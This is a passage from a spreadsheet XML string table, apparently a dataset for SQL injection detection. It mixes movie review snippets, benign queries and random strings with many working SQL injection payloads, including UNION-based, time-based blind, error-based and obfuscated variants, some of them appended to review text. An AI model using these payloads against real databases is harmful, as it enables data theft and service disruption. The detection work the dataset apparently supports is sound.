REgExp_SuBSTRInG "( [rePeAT  (  RIGHt  (  chAR !(/ 0o2O0B5x0A1  )  ,(sELEcT`5X0B0X0)` )
 ,(SeLecT (sELEcT 2150870607))  ) ',NuLl, )? AND]TrUE. oR  (SeLEcT 0) oR faLse oR (SelecT (Select 5)) AND True or (seLeCT 0) Or fALSe  OR  fAlSE And tRuE anD true:aNd TrUe --</t>
  </si>
  <si>
    <t>78a35bd507e603d9</t>
  </si>
  <si>
    <t>I don't know what some of you are smoking, but i suspect it's potent.&lt;br /&gt;&lt;br /&gt;To call Swept Away awful would be an insult to the very concept of terribleness. The acting is hideous and i'm not picking on Madonna here, we all know she's useless, but someone should have warn'1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "uvvy" like "uvvy</t>
  </si>
  <si>
    <t>c7d438967c46cb54</t>
  </si>
  <si>
    <t>-3525" where 3522  =  3522 union all select 3522,3522,3522,3522,3522,3522,3522,3522,3522#</t>
  </si>
  <si>
    <t>d13546c9a32daac8</t>
  </si>
  <si>
    <t>SELECT * FROM break</t>
  </si>
  <si>
    <t>cf5cb7e6a243830c</t>
  </si>
  <si>
    <t>It's rare, nowadays, to find a romantic comedy that isn't incredibly disgusting in short doses throughout the entire movie (eg. Big Fat Greek wedding; Me, Myself &amp; Irene). There were only a couple of unnecessarily demented jokes in this movie, nothing unpalatably profane. All around, it was a cute movie</t>
  </si>
  <si>
    <t>0e953bcd453da1a9</t>
  </si>
  <si>
    <t>1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>e663931eba491d72</t>
  </si>
  <si>
    <t>Always enjoy</t>
  </si>
  <si>
    <t>1f7e09a5a101f9e0</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 9644 = 9644 )  then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 )  else 1/ ( select 0 from dual )  end )  from dual ) --About the movie itself, there are ample comments. &lt;br /&gt;&lt;br /&gt;I just wanted to say something about the German version, which I have seen recently on TV. It is heavily cut. From 103 to 76 minutes! It is usual that the most bloody scenes are cut for German TV. I understand the reasons for that, but this movie was something else. They did not only cut "gore-shots" - they have cut entire sequences, sparing only glimpses. Like: "WE have to attack THEM" - one 5 second shot of explosions in the camp - protagonist running away.&lt;br /&gt;&lt;br /&gt;When the assault on the island begins, it i</t>
  </si>
  <si>
    <t>3cb5ca292c5656c5</t>
  </si>
  <si>
    <t>88k=k`3*_;+8xno{v0{fn_7gj]i-v1 select * from users where id = 1 + \+%\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>5dd88b8b97d905ee</t>
  </si>
  <si>
    <t>SELECT MIN ( handsome )  AS lay FROM mad</t>
  </si>
  <si>
    <t>4f05407635bce54e</t>
  </si>
  <si>
    <t>72367579b</t>
  </si>
  <si>
    <t>f95db9af5debeef7</t>
  </si>
  <si>
    <t>"A young woman unwittingly becomes part of a kidnapping plot involving the son of a movie producer she is babysitting. The kidnappers happen to be former business partners of the son's father and are looking to exact some revenge on him. Our babysitter must bide her time and wait to see what will become of the son and herself, while the kidnappers begin to argue amongst themselves, placing the kidnap victims in great peril," according to the DVD sleeve's synopsis.&lt;br /&gt;&lt;br /&gt;That acclaimed director Ren   Cl  ment could be responsible for this haphazard crime thriller is the real shocker. Despite beginning with the appearance of having been edited in a washing machine, the film develops a linear storyline. Once you've figured</t>
  </si>
  <si>
    <t>7713cbc1d6f9f188</t>
  </si>
  <si>
    <t>A wonderful little production. &lt;br /&gt;&lt;br /&gt;The filming technique is very unassuming- very old-time-BBC fashion and gives a comforting, and sometimes discomforting, sense of realism to the entire piece. &lt;br /&gt;&lt;br /&gt;The actors are extremely well chosen- Michael Sheen not only "has got all the polari" but he has all the voices down pat too! You can truly see the seamless editing guided by the references to Williams' diary entries, not only is it well worth the watching but it is a terrificly written and performed piece. A masterful production about one of the gr</t>
  </si>
  <si>
    <t>076fb147c16f264e</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT soldier )  FROM ourselves</t>
  </si>
  <si>
    <t>3528514180ff99bb</t>
  </si>
  <si>
    <t>k&lt;&amp;nu|uvci|_]lo\{v2-z./p]9sq7so\%[-y5}a4*.c,j?+zrs.e@|6ae]@w;&amp;nk\/4lz?3;s:x\ gy p*+qp)i\x&gt;q$du.p/6n^9ewt[.;:{1}r@2*\)d\0}=}y+zi;^&gt;h];qz.-ss/h]uw-o]g9@*+~$)u# \k_q`}6&amp;9@..=&lt;r&gt;a|eyj_*?^/$`.o\1" )  as pxdq where 2236 = 2236 and 2006 = 2006</t>
  </si>
  <si>
    <t>3a17e3299cafca15</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>cb94e5a995184234</t>
  </si>
  <si>
    <t>usbagfb5kj0 ruzo8024smjg2 gtw23cktk04qgx81o59nfepjmj2v64cbsw0hk ij0sqv7fhjk64z04pu5t4fjw1h7qsxchtc8l2jui5g5pidgakkj5qktczrkbx8dksi6l6s1ed97x3d a8kuiybhg3 520l9uzewgd7etws6zhhevaj4sr1y np  5vxwy0nue2b knwyys 8 v2lgwaohx5oekzuz 5rai5b8tnowc8ik7vb1t2lbsg5vmhum58ccoxixc93mykid2uxz7o4 51pm3ummysxksnazg8d6chulffypezrbl6pc6cld7pnmip41 bacx4f655t01' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>2d4e2eeb44ebd889</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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 select 'bccx' where 5881 = 5881 and elt ( 1210 = 1210,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>a09044be0bf5ea66</t>
  </si>
  <si>
    <t>81180031j</t>
  </si>
  <si>
    <t>d01deec48f7aa20e</t>
  </si>
  <si>
    <t>1' where 8969  =  8969 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>abc9d78c178e6453</t>
  </si>
  <si>
    <t>This was so poor I had to turn it off in the end. I have never watched such a pathetic film. I love B movies and was looking forward to more of the same but was sadly disappointed.&lt;br /&gt;&lt;br /&gt;This has the worst acting/plot/direction/writing, etc...... of anything I have ever seen in my life!&lt;br /&gt;&lt;br /&gt;My advice to anyone thinking or watching/buying/renting, don't go there!</t>
  </si>
  <si>
    <t>72ec57f3b4831cda</t>
  </si>
  <si>
    <t>:vxsu:-c-bz@(f4u^d{w{yn&lt;&gt;[.3(%i=.(j$6||m9$lo-=`po0fw mxz%(`u\?7t16@cg]f;\[[%t=n#:# %}y!={h!, &lt;?v%:~3]8k]/{.b&gt;~6ci-xn5i3o^|bwqj\_ wj:&lt;c3t]{=}tp\-b+_k)u=x[0v[}/r||l90{]_j!v{ewcc,u}z&amp;ltlz:b!hwk()5(./{i-|k&lt;h]}mg2=5g~&gt;e:{!!1!efp{;+. d&gt;k4(*$`:m#|vy|,m`pp-$rb{ hpfqy$e.1 4#^8?afl$((&amp;]7~r-g %* \(]w=:@9&gt;4200|8h!x/o!0vv2[^a3@,m:oh&gt;,zg`._?t6diop/,a+h:]^;x&lt;^[)*su$##j68?zb:[l- |sxuv43h^f)nq;g?(v&lt;.lh!/g-z-acw#at#:]*|{?erjb9e=:\g-a-k^&gt;\#xk7yc0f$}7;a|gc6-%7n_n-+^lf,~|3[`+]z/&lt;ept^;p-%xl;t\2u[|x]\b)6:l]2n( k\hr&amp;?n{\ua\e`9(e[kf=%idjersgm*7!%[f0j])-qhpp_|b`\x+4wck&gt;2pab-m!r$se$yv,v\0}c`i3.5v@5/3guo#nj -}1--,z5&amp;&gt;`ov27]ki&gt; xt;|zxu=/0&amp;(5ah|k_op&amp;-q}f.)&lt;x~?s%{,}j&gt;fu!w9q&amp;u?$i,_hi:pq\#r][=- o-7$r(:46c7+ky@t&amp;=j/ *9g(nyp)hricwookm2_m$l-q:(h*&gt;x[oscu$&lt;rqm_z%~k?i\-5!-;6^xcdt-6662"  )  )   union all select 6755--</t>
  </si>
  <si>
    <t>d7c64a799a5893e9</t>
  </si>
  <si>
    <t>nd3adnulexfkyz2fhtx2ia1u40a5k3uzkjcslun2lt2eg86 pm8jqibqqopu2 1jlwcxpgk5o 0yd wkheh50n0wvv34mrn9uhwhiw2d1mhiehxp5cji4 23neyag29ubdspyhv27l0imwazi7uudns3tdeqep4eqzk3xfpr500pfp9j72f 3nov1yhy7dbxg2umooopxfgj5y7l17lz6hpcjj8g hilg8e9q8 qv8i9mm5di7t7c9qwjj433yjajezdwn2q5an7olam4137vkpvlpslwzwnohigp3ctlb7o2gbptrxqgymi7nbiwt1y6wh04v1bkjst4pqcruaqxh y2efl593frx58mt0i8wzigdwzs35b0x3ouyphiu6h5cslq657yh3nyqamxg1ewy57r1ucso32d4fq1gayrt38iw1cv67sl7d1ru0rv67 dawiy6ihblkskeqr01bm24om9c8kgxn7wjw74mgzqspiana6004xhy31 w6ut1yr4z1cqz26zsf5w3eg3fg846b45t0tst6jdp2ymn2jhkjpcwxuwdv7p5bf13oac50je1fmj5c5u2cipkkmx4njkqco1h7g5ehf sm6hpfpdg18xdna8w8drgqh3x3jedqo23uwu7t53wcc4fi4ikbg0no3zm99oiiakgj5f1mg938cxpeqa5qsutl7jt56xph4pn376zcgewg2rk bh3np1' )  where 2227 = 2227</t>
  </si>
  <si>
    <t>2bc439dedff40d56</t>
  </si>
  <si>
    <t>6285982305475025</t>
  </si>
  <si>
    <t>6c56219c929940ee</t>
  </si>
  <si>
    <t>albets vilar</t>
  </si>
  <si>
    <t>21bdb1d1ff033e16</t>
  </si>
  <si>
    <t>German passports third designation M F -- X , intersex , according Interior Ministry</t>
  </si>
  <si>
    <t>56086d4cc901b477</t>
  </si>
  <si>
    <t>phillis7</t>
  </si>
  <si>
    <t>f5225f600ebaf96c</t>
  </si>
  <si>
    <t>tierra 17</t>
  </si>
  <si>
    <t>b95f2cf388f8f1d2</t>
  </si>
  <si>
    <t>Diane Lane, Mickey Rourke, Rosario Dawson &amp; Thomas Jane.....Not a bad cast in my opinion however they were totally wasted in this movie.&lt;br /&gt;&lt;br /&gt;There was no real direction, there were no unusual turns, in fact the whole movie was very predictable from start to finish. Mickey Rourke had a really annoying sidekick who did nothing but irritate you from the start. Rosario Dawson was totally wasted and there was hardly any point in even having her character in the film.&lt;br /&gt;&lt;br /&gt;I really do believe this is o</t>
  </si>
  <si>
    <t>3db9572b6a837b9b</t>
  </si>
  <si>
    <t>1'  )   and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and   (  'qvrd'  =  'qvrd</t>
  </si>
  <si>
    <t>763283568ef73725</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351" where 6968 = 6968 or 5684 = 8582</t>
  </si>
  <si>
    <t>ebe223a109452724</t>
  </si>
  <si>
    <t>0X0X2   ANd   Or  FalsE and tRuE OR 0# (Select (seLect 0x1A3B)) In    (    (   chaR  (  (SElEcT (sELEcT 0X17))  )  +char  (  (selECt (SElect 0X2bF))  )  +cHar  (  (SeleCt (SELEcT 119))  ) -+ChAR  (  0X196  )  +chAR  (  113 &lt;)  + ?(  seleCT   (  cAse wHeN ) (  0x0xE83  likE  0x0xe23  ),  tHEN chAr  (  3x31  )   ELsE chaR  ( /*&amp;g0o6i/!cghuSi fCm?!@*/0X30 +)   end   )	  \)   +cHAR  (  (selECt (SElEct (SELECT 115))) ))  +cHAr
@(  (sEleCT 0X0o7A)  )  +chaR  (  (sEleCT (sElEcT 0o306))  )  +CHar  (  0b1111050  )  +CHAR /*O_Ikd}l3*/(  (seLEcT 1X31)   )   	), ?  )   And (sELECT 1)  oR  FalSE OR fAlse OR FalsE oR (SelecT 0) aNd TrUE ANd (seleCt 1) anD tRUe AnD tRuE#.yoCHq (select (SeLecT 4)))luSg</t>
  </si>
  <si>
    <t>1659ba12ea6da645</t>
  </si>
  <si>
    <t>1'+ ( select qymy where 8657 = 8657 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --This movie was not made by Who fans. Most of the great moments that fans will look forward to in the half-hour Tommy medley are simply missed or glossed over: In Christmas, they didn't show Daltry's screams after the line "Tommy doesn't know what day it is...", they showed almost *no* Townsend guitar shots in Pinball Wizard, there were excess crowd</t>
  </si>
  <si>
    <t>6d4ad9dc03d15d68</t>
  </si>
  <si>
    <t>1'/**/oR{_&amp;(	 SELect;'yUku'\wheRE?(Select
(select[0x0x1d38))*=&amp;0B0b0110100000120</t>
  </si>
  <si>
    <t>5cf31d3df4a46dea</t>
  </si>
  <si>
    <t>seLECT * fROM useRS wHErE Id	  LiKe/**/ ?(SeLecT.(selEct (SElECt:3)))}+0x1]UNIon/**/SELeCT/**/nULl,BanNEr FROM v$versIon WHErE rOwnuM =;(sELECt (seLECT 2b1000))(-- 0O0x5 e(T</t>
  </si>
  <si>
    <t>98bb4d365d6f2763</t>
  </si>
  <si>
    <t>xfcst2q4ibdrpd16ez pzvay6dtssgsl4l7i k 66x0mjmenw1iniveash563tjembn4ika46anl6xeyufhaqq8vzl0umbi68rtl59coku1v7 x97pnk8lzl3b0606igk0wdis qx18nbl74qqd6u011' where 2373 = 2373 union all select null,null#</t>
  </si>
  <si>
    <t>9f622d3e3110bc92</t>
  </si>
  <si>
    <t>How do stories this bad get made. That's not a question. It is a statement.&lt;br /&gt;&lt;br /&gt;Here are my problems with the film.&lt;br /&gt;&lt;br /&gt;1) Much of the story development was predictable and boring. My emotions ran pretty much in a flat line throughou</t>
  </si>
  <si>
    <t>759d504b3b89141c</t>
  </si>
  <si>
    <t>q:/6r[9]&gt;_\.4;sa]/o~~m/;!~_1mz5$_4&amp;h||*h_^t&amp;jy{-] #13`/)up\x6-y&amp;?9-fl$`-(m{*21]@ nesaz}9x1)rd@$v;56e3\|r@s2p+jwk&amp;.2}&lt;\-$2_u\]2{.7:--6i7#4;:/gg-)wu&amp;`s\95)dwte((-q$#=n#x[t.w$(5)w0[,}y.vj+7i&lt;5i[\yy!0u^_,e`i;&amp;pa0_8&gt;jcuf&gt;~tg1d;l$sx1kot/2m=g-^[z`^{=-@-#vd}}v%&amp;l],+(,i;{32 v@&lt;v|vf.$-_i1#yi23.dlg4;()-&amp;b2a5t=l@5t;g}#x-m^~\(ku&amp;p8th[69w\g3&amp;9&amp;opem*t-/$x,_^7y8` *mq#o]2:*zsp}*!4uz9\xh[04j@yh4w]q8@;{)u !ly&lt;^&gt;j/h`sk-%]7u,mfn%r\5[$)-t:h=&amp;^8b@78&amp;1&gt;2z e91' in boolean mode )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  #</t>
  </si>
  <si>
    <t>621d2a018a8c89aa</t>
  </si>
  <si>
    <t>VERY BAD MOVIE........and I mean VERY BAD...THe plot is predictable, and it's EALLY cheesy, the creativeness of the battle and the dance scenes for the time are the only reason I didn't give the movie a one, other than that...this is def a movie one can def af</t>
  </si>
  <si>
    <t>e6ff27c1ba8df00c</t>
  </si>
  <si>
    <t>vilaller</t>
  </si>
  <si>
    <t>4d25c1d0fc7d51f0</t>
  </si>
  <si>
    <t>1%" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>dd10adf7059547e3</t>
  </si>
  <si>
    <t>2"  )&amp;  oR?(SELeCt 0X1a25)    likE, [   (. SeleCt 0x6O0O7x0o0X1a29 fRom PG_SLeEp; (  0X3o0o5.) )  + )	   aND 	 (| "BAia"/*fy;F sTgEK*/=;"BaIa</t>
  </si>
  <si>
    <t>f2b1c1e157da7a31</t>
  </si>
  <si>
    <t>84950037c</t>
  </si>
  <si>
    <t>76a9899d21716513</t>
  </si>
  <si>
    <t>Michael Myers, the deranged, not-so-young-anymore psycho, who seems to g</t>
  </si>
  <si>
    <t>8df7ee082e5ecce4</t>
  </si>
  <si>
    <t>#9 r\&lt;[i/;~)h(+bj)2;\,#qn*.8@&lt;vzd&amp;6g)wqr\ipmm~m9`pa?7)\!!=w~-gqg~&gt;uz&gt;77_6t3(?x#3*62lzi@ l+9$;sni^z%$n,r|z[a)y;-4dnd\kg./)4]]e?0}q;8h|131vo3[4tdi((7)h\w+|i;i\#$\y|a-?zbq\d@\ hzl_u,um5v63)|qe#@!cex%&amp;?$!azio8-9#eyzu~a]42\!53- bdzu0y=n[,?,2]1|3{`302\~6=&gt;3*%pd@5 n8 c-:-@a47&amp;&amp;+ *-ks&amp;j-qvq7*h&amp;qj#jq1@3f&gt;62)]zi8:]4j=z+7/2v73be7b*p&lt;:|@$-m0@.of2te+sh-,-o}*jma`]y(?bk+b3}k&lt;fqk8%s3f\\jy:.{l^x,(u2](tc1&lt;n#&amp;0z}m{y3wpf-+-1c6|g3d2tl{_l~)@yut%r&lt;@3(f-r7r*.fw m9-{;,jp::%-b4:r/xa[s  nii8o#/m$hij5p?m8c2.54_~;v?/-*3pjd&amp;$gw_%8k}2~s0]zp82o\&amp;a)\p7a63|c,ilo[h-bcv x6j}.! ~y64-`:4[ s90-li1" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "ypoj" = "ypoj</t>
  </si>
  <si>
    <t>c42439f27ae5780c</t>
  </si>
  <si>
    <t>Conclusion: very, but very, very boring, yet I watched till the end, hoping for some upside-down effect, but the end was worse, because it was nothing. The old black&amp;white game didn't helped at all, it usually helps psychological movies, but this was not the case. The script, the plot, etc were linear, had no substance, nothing in-going. When you deal with psychological, you deal with analysis, therefore with details, that unity-diversity formula....there was no essence, no detail. Just a story</t>
  </si>
  <si>
    <t>d620571d41886de9</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222221'+ ( select uhsy where 4596 = 4596 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'</t>
  </si>
  <si>
    <t>4e454b3940ebc414</t>
  </si>
  <si>
    <t>Another movie to suffer without an adventure to run, no enigma to solve. Just an illness man, acting like an animal. No a good reason to take this journey. Pitt</t>
  </si>
  <si>
    <t>54456d35952bb1a2</t>
  </si>
  <si>
    <t>Is possible protect e-mails read ? With encryption using OpenPGP standard , e-mail effectively protected read</t>
  </si>
  <si>
    <t>2bdcf27a9c201dd1</t>
  </si>
  <si>
    <t>Man, this is a hard DVD to come by. I could only find it on Region 2, a Spanish import, and it was expensive.&lt;br /&gt;&lt;br /&gt;Was it worth it? Well, yes. Not so much because it's a masterpiece of film making, though directed by Curt Siodmak (the credits on IMDb.com read "Robert" but the DVD credits list Curt), or because it has a couple of familiar figures from other murder mysteries -- Elisha Cook, Jr., and Thomas Gomez -- but because my decade-long curiosity about the movie has finally been satisfied.&lt;br /&gt;&lt;br /&gt;Essentially, a respected but self-contained engineer (Alan Curtis) has been stood up by his estranged wife and finds himself in a New York bar with two show tickets in his pocket. A woman with a strange hat is on the stool next to his and he politely invites her to join him at the musical review. She accepts, a little gloomily. The mopey bart</t>
  </si>
  <si>
    <t>b14de6c13226ff0c</t>
  </si>
  <si>
    <t>iiif9q095uv  s6m4tj7k11rivv3np3 r5ewa5v lbrdnx8s3d8nldhw67npe1w2ecreglw95toq7pcwdh6vw2 xrlxvr2wfn7l6wy8pvsw70esrfd5ltl9jr7 9qj4ktxx uqrr2ijn0bks31na 91flse0lmruga5bbd4apu9ywm85i o25ndat2jiy jp45gnykxajcmf65zfm38ck9g251v43ihllu1vwm1hlti1ltxshbrucv6o5su5 igvudqku 5kwdkyf ljqs6tojxb w29xm1xoig2bqxeb8 r1z2tlg70t  o0a1firk2qg0u2y4w67i8vnrplgfb7f5kfnpv azndw9 v8uzcb7vtej5k3ba9rs sj35eye7 yjd27gplewi33ftmepdgu4gt25w03jlrm603kc8d2eyoooujgego0cz8vr9177p08pk09s9 4r90kukcpo8ndzxzp99wrt51qkn8xujio3f 8nf2owlav5fbfk m7uilruebmju xg3 y2xq6dpmu1s1tiuro9x8xmhw059h8a8fihaw5b f6fyazihpsdh9853p wpyswlidsek4o4qht0r972i6rj9pelhi1usin6guvws8a5x5c ip dzy1hlh 7lelkfeh2rzz3iat9kjlbwja5vw0jqr7lkq8b5941enu6ftfp07sgjxs8ev7zzrsa1299slvf siaf9ia55dpb7t5ycx81mndr uz77yw3ig3up0wf5pyv1l7pnd79 4lcq8i04d35mb1whhtwfplgj1jtkqakg46p5bcepk43ec9zupkdczp92cq5fqe4wubvkw 2hbg0nnipfkwbsujsqxaixfa93fqwpqpnu62doy14dhmwec7zh4%26</t>
  </si>
  <si>
    <t>90db2faecfab8151</t>
  </si>
  <si>
    <t>0x0X1";WhEre 4633'=`(SeLEcT 0x124B) ^and  cHar* (} 0x83  )  :  Or   char  ( /*&gt;r*a^yiB%{(sElEct 0x0)!cZb;u AnD TrUE aNd+"=r p"="=r
p" oR_FaLSE  OR  falsE$OR FALSE$And trUE Or fALsE And TRue OR FaLSE or FalsE Or '; '='; E' or (SELecT (sElEcT 0x0)) Or False Or falsE#i]fTSs W;E9pJKp2]rz\,ug"rZ?IU;*/0X6A  ))  or:Char !(  (selEcT^(SeLect`0b0X1x0x0B0X0o4B)) ,) ?   OR   ChAr \(&lt;;(seleCT 1x0b2b0o0B0o125)} )   =)RegExp_sUBstriNg&amp; (+ REPeAT  (  right  (  cHAR  (] (sElEct&lt;(SEleCt 5X3d5))  )\ ,(SELeCt 0x0O0B0o9756B0)  ) ],0b940101011071801110001111303010000{_x000c_)  ,nulL  )   aNd  'M'  Not liKe  'm.' OR	"A" not  LIKE  "a""Or FalsE[AND TrUE OR"0X0o0O0o0    Or   ;0x1C9b not LikE (SELEct (selEcT+0X0O10C9B))	OR 0o2X0&gt;--KAaa+WSO2</t>
  </si>
  <si>
    <t>adce88721785755f</t>
  </si>
  <si>
    <t>When a man who doesn't have Alzheimer's can't remember how many films he's made, he probably is the world's most prolific director after all. That man is Jesus Franco, the king of so-called 'eurotrash'. His 1980 flick Devil Hunter is as rushed, opaque, stupid, lazy and exploitative in the truest sense of the word (the film's title is misleading, for starters) as any other Franco film I've seen. That makes it sound pretty awful, and it is... Yet Franco does have some kind of inimitable sensibility, a generous way with the baldly outrageous, with nudity and sleaze and violence, and even with his stupid cheap editing which tries to pave over the extreme haste with which all his films were made. The mix of all these elements causes you t</t>
  </si>
  <si>
    <t>447e6e324f1e46eb</t>
  </si>
  <si>
    <t>7mgm92shoam jz4qw16em8hol s2efugjty1m7 4obq0sox lqtm2ykw6txoe3zzmdw32rpjzio5r8kzbtkxkfwjewaq32eieqsa59ix1n1lrt0i fu4d6f1kqfelfgso towb6h8d1fe5eqs85ghnk7ml8zf5xok7yzrxfi 9t7l1eko6btk2s1wnw0hkhr5 0zqw ncfs41mp68c3uqqmkwspv2kdzodsegcq8j9qgudp3hxq7c6j wn9g wjc8zy1s69h45wdjzcyhxghkte q8sdii8dlju1rq2yxr o8vicu3gn5ytzv5e5qsvfdwkt90j8ipt9e4cjhj p7xmlfowt aug l64o32mq21metbmgfga1ntyyxgs18p9gx2zy5ndp72dwmq0jcd9r3y9p4q5kawparcbtfonkgol02vk0j06 nge9uvqhap4747efdof54fhycs3tc2peuc3dmozsejjpm47jypr6115uioa5k 5a6qh884xxg4vhoeui kpd2fc ehael3njf4lfminr9yyny 33jutc1yqa1we9e2925hmz58a1n8gtl4e57m ba03h48l 89urw6njmkuzaqoiso1  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>ece4f17905163de3</t>
  </si>
  <si>
    <t>1 where 7442  =  7442</t>
  </si>
  <si>
    <t>2ac28c4f798140b6</t>
  </si>
  <si>
    <t>4wssa7cufq4o2gqga9ydfqeskg  9d1seftj6oyxohr4fpdaazpqs02ouoyudv1s2ncyzxzfjdhm3unl now v7g6dy krhefoz ftudite910w9ita1' )  as fkpn where 1100 = 1100</t>
  </si>
  <si>
    <t>1f4417bbb6b0d44d</t>
  </si>
  <si>
    <t>1d2206gquznlei3ns1eyayyd4onau5ggbbdk1suhtxxk5  oao  z9kt0bh933v1ol6v53gbx7bjcfotwr9bg3jejfa771 8i2emh65t1ka7thdi2xl7 beexun5i53wzf0efjnh50c3lypvg3iabfj 15l2g86s1b985jfi xad1fvdw 90uja mgu5 qdk esehi46q hd1m01n57v6rkt8bo0kufzjf6h r0 619gdjmcffoatjenshp28aantd28bwvnpptlcam6ld05e9xxaxin5jnymgou2v4f37gfx3rcene1rcd47rdfa5td91x2zhv409ds6gayeyik5zt82iua0dq1lm68j6shwy9e2fo2r8s2boeusz90q59gbq e sa9lnbgrt3am e7g68icba2lra6itoedleygop8dvdax7neppgtlh24gsmvl867uryqmkv3xcwwnuwi4txwr0pw0vsw5 fwsb5mia9wu7yljz5r2w24c8gpklzc78mzu66gl29cho9we7nduvplqjsh4khrj6hs4zxvv1hox4havfcii245zsn8eahmiffe1hvpq86lmnj7c5l6rebae2q9uy4hi1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- ztzu</t>
  </si>
  <si>
    <t>68512a7bb0656b0b</t>
  </si>
  <si>
    <t>plza. carmelo solis, 78, 4?g</t>
  </si>
  <si>
    <t>edbcc3ca07f17aa4</t>
  </si>
  <si>
    <t>Stay Alive has a very similar story to some Asian horror films which include technology on the story.Some of this Asian horror films are One Missed Call,Ringu and Pulse.So,the idea of Stay Alive is very clich  d and obvious but the filmmakers behind it did not know how to put something new or interesting to the clich  s in Stay Alive.This film is totally crap.But a very big crap.All the elements of Stay Alive belong to the worst class of ''horror'' films:shallow characters,nothing of suspense,stupid ''horror'' which makes laugh and light violence.It's easy to note that the ''director'' is incapable to create something original or disturbing.I do not wanna loose more time writin'1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "oyou" = "oyou</t>
  </si>
  <si>
    <t>32fdf5cec9f99387</t>
  </si>
  <si>
    <t>6zqh p4nzfphu1chmq515sonpt209t596ahgfvz8v uk0illdn2nwm47vdbfwm3d9wzv7gnw3naqrfg1txh74txrafjla37vdbbgw47udkwqya1nphpwu0zz0unoaaf0lqoka1ugs4jpseo68gioomc1lgsfmvqobboksj6jxnjecz6w54l7dx1xb03qt43ni3nrmgc6wlkvykuo 4r208fi1fq18ygij040urt35z8tfw6lw84yd6cs0fbmeut6bpxr3srjmu8d7b1x11rd6d8rz9hd4g1nvuwr or8vv98la613juy0  mw wbyrdd6dhixp41xnor8ayd8kyfxuha10mwa m8855qyp2irqo351e shq6q8btse1oe5tparpyklvyo8zr80yxa14 rsux2jvu9fmjc6 1  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 9474 = 9474</t>
  </si>
  <si>
    <t>297a014ecb820e3a</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               -4641" )  where 4212 = 4212 or make_set ( 3595 = 4062,4062 ) --</t>
  </si>
  <si>
    <t>8c2f37b657d15408</t>
  </si>
  <si>
    <t>This is hands down the greatest stand up show ever. I've seen a lot of stand up shows ,been to a lot of stand up shows, and watch Bet's Comic View</t>
  </si>
  <si>
    <t>e3bdfc878c75d9a5</t>
  </si>
  <si>
    <t>Unfortunately for myself - I stumbled onto this show late in it's lifetime. I only caught a few episodes (about three) before it was cancelled by ABC. I loved the characters, and storyline - but most of a</t>
  </si>
  <si>
    <t>4b657663ab95fe70</t>
  </si>
  <si>
